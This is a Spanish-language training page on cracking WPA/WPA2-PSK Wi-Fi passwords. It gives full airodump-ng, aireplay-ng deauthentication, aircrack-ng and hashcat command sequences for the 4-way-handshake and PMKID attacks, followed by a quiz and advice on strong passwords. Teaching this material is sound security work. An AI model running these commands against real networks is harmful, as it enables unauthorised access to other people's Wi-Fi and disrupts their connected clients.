Saltar a contenido

03.-Ataques Redes WPA-WPA2_PSK

Las redes WPA/WPA2 fueron diseñadas para superar las debilidades del estándar WEP. Sin embargo, se han desarrollado técnicas que permiten descubrir la contraseña de acceso a estas redes.

Usos

  1. Redes domésticas o de invitados con cifrado.
  2. Dispositivos confiables en el segmento (Impresoras, IoT, dispositivos VoIP).
  3. Hotspots pequeños para grupos específicos (VIP, Administradores).

Problemas Asociados

  1. Todos los usuarios comparten la misma contraseña, lo que genera problemas de seguridad.
  2. No hay distinción o autenticación individual de usuarios.
  3. Redes críticas pueden usar este estándar, aumentando el riesgo.
  4. Contraseñas débiles son vulnerables a ataques de fuerza bruta.

Tipos de Ataque

Con Clientes Conectados (Cracking del 4-way Handshake)

Monitorizar y capturar tráfico

    $ airodump-ng wlan0 -c 11 --essid 'nombre_red' --bssid AA:BB:CC:DD:EE:FF -w captura

Forzar deautenticación para capturar el 4-way handshake

    $ aireplay-ng -0 0 wlan0 -e 'nombre_red' --ignore-negative-one -a AA:BB:CC:DD:EE:FF

Crackear la contraseña con un diccionario

    $ aircrack-ng -b AA:BB:CC:DD:EE:FF -w diccionario-contraseñas.txt captura.cap

Usar herramientas avanzadas como hashcat

Exportar el handshake
     $ aircrack-ng captura.cap -j handshake.hccapx
Crackear con hashcat (máscara y diccionario)
     $ hashcat -m 2500 -a3 handshake.hccapx -1 "_-.$?!" -2 ?l?u?d?1 ?u?l?l?l?l?l?2?2
     $ hashcat -m 2500 -a0 handshake.hccapx diccionario_passwords.txt -r reglas

Sin Clientes Conectados (Cracking del PMKID)

Capturar el PMKID (RSN IE)

    $ airodump-ng wlan0 -c 11 --essid 'nombre_red' --bssid AA:BB:CC:DD:EE:FF -w captura

Exportar el PMKID con aircrack-ng

    $ aircrack-ng captura.cap -j pmkid.hccapx

Crackear el PMKID con hashcat

  • Máscara:
    $ hashcat -m 16800 -a3 pmkid.hccapx -1 "_-.$?!" -2 ?l?u?d?1 ?u?l?l?l?l?l?2?2
  • Diccionario:
    $ hashcat -m 16800 -a0 pmkid.hccapx diccionario_passwords.txt -r reglas

Para Saber Más

Consulta este video en YouTube sobre ataques WPA2-PSK basados en captura y cracking del 4-way-handshake.

Nota: El uso de contraseñas robustas puede mitigar los riesgos, ya que los procesos de cracking son lentos.

Autoevaluación

  • Los ataques más comunes sobre las redes WPA/WPA2-PSK con clientes se basan en:

    • Realizar un ataque de fuerza bruta probando diferentes contraseñas contra el Punto de Acceso.

      • Incorrecto
    • Capturar la autenticación del 4-way-handshake de un cliente legítimo en la red y realizar un proceso offline de cracking.

      • Correcto
    • Buscar contraseñas por defecto de acceso a la red.

      • Incorrecto